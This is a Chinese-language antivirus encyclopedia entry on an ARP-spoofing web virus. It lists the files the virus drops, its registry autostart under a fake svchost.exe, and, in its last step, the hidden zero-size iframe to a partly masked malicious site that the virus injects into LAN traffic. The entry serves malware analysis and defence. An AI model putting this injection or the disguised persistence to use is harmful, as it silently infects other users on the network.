病毒名称(中文):
ARP欺骗196608
病毒别名:
威胁级别:
★★☆☆☆
病毒类型:
网页病毒
病毒长度:
196608
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
这是一个ARP病毒。只要中了该病毒,在局域网内的机器打开浏览器浏览网页时,毒霸会一直报病毒。该病毒
利用传送数据包时嵌入带病毒的HTML代码,访问恶意网址下载恶意病毒。
1.病毒运行后,首先释放以下病毒文件
%Systemroot%system32\Packet.dll
%Systemroot%system32\wpcap.dll
%Systemroot%system32\WanPacket.dll
%Systemroot%system32\Drivers\npf.sys
2.创建自启动
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下
创建KVP项,启动参数为:C:\WINDOWS\system32\drivers\svchost.exe
3.该病毒会将自身复制到%Systemroot%system32\Drivers\svchost.exe.
并运行%Systemroot%system32\Drivers\svchost.exe,之后又把scvhost.exe
(注:与svchost.exe区分开来),释放到%Systemroot%system32\Drivers目录下.
4.往同一网关内的所有IP的数据包内插入以下HTML代码:
iframesrc='http://www.z****0.com/0.htm'width=0height=0
使局域网其它用户访问其恶意网址.